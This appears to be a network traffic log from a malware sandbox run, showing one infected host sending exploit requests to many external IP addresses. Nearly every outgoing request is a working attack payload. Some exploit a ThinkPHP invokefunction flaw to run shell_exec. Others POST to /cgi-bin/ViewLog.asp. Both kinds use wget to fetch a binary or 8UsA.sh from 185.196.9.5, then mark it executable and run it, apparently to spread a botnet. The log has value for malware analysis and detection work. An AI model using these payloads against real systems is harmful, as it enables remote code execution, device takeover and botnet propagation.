Feb 25, 2024 19:03:15.085644960 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:14 GMT Date: Sun, 25 Feb 2024 18:03:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 39 34 26 23 34 36 3b 33 36 66 38 62 63 33 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.5d7e19b8.1708884194.36f8bc39</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
300	192.168.2.15	60852	112.148.112.212	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:14.602549076 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
301	192.168.2.15	47418	95.141.170.82	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:15.082931995 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
302	192.168.2.15	44744	95.65.89.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:15.119234085 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:15.337697029 CET	364	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
303	192.168.2.15	42632	85.92.113.243	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.346137047 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:16.492238998 CET	400	IN	HTTP/1.1 400 Bad Request Server: WAF Date: Sun, 25 Feb 2024 18:03:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: waf_404=21e8e2ce-446a-44de-87bb-cb528f8e5cca; Max-Age=300; Path=/; HttpOnly Cache-Control: no-cache, no-store x-frame-options: sameorigin Data Raw: 35 36 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 27 2f 68 6f 73 74 5f 6e 6f 74 5f 66 6f 75 6e 64 5f 65 72 72 6f 72 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 56<html><body><script>document.location='/host_not_found_error';</script></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
304	192.168.2.15	58806	95.216.198.193	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.395642996 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
305	192.168.2.15	44820	94.187.110.255	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.423511028 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:17.574050903 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
306	192.168.2.15	44934	94.123.131.53	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.423559904 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:20.550151110 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:26.694036961 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:38.725950956 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:03.557686090 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:52.709270000 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
307	192.168.2.15	60362	62.29.46.87	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.423590899 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
308	192.168.2.15	52368	94.120.233.217	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.433262110 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
309	192.168.2.15	57530	94.131.62.181	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.445008039 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:16.543915033 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 18:03:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3572 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, s

Session ID	Source IP	Source Port	Destination IP	Destination Port
310	192.168.2.15	58252	85.28.171.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.637051105 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:16.842628956 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
311	192.168.2.15	54342	31.207.39.132	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.813421965 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:16.990268946 CET	304	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:16 GMT Server: Apache Content-Length: 126 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
312	192.168.2.15	47856	31.136.48.53	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.819053888 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:17.382141113 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:18.502197027 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:20.806019068 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:25.413942099 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:34.373955965 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:53.317805052 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
